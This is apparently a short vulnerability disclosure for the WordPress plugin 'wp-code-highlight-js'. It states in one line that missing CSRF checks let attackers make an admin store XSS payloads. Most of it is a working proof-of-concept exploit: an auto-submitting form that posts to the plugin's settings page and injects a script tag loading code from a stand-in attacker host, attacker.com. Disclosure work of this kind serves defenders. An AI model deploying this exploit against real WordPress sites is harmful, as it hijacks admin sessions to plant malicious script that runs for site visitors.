Lack of CSRF checks could allow attackers to make a logged in admin create XSS payloads.
<form id="hljs" name="hljs" method="post" action="https://example.com/wp-admin/options-general.php?page=wp-code-highlight-js">
<input type="hidden" name="hljs_location" value="local">
<input type="hidden" name="hljs_package" value="common">
<input type="hidden" name="hljs_theme" value="default">
<input type="hidden" name="hljs_additional_css" value="</style><script src="https://attacker.com/poc.js"></script>">
<input type="hidden" name="cmd" value="hljs_save">
<input type="submit" value="Submit">
</form>
<script>
document.getElementById('hljs').submit();
</script>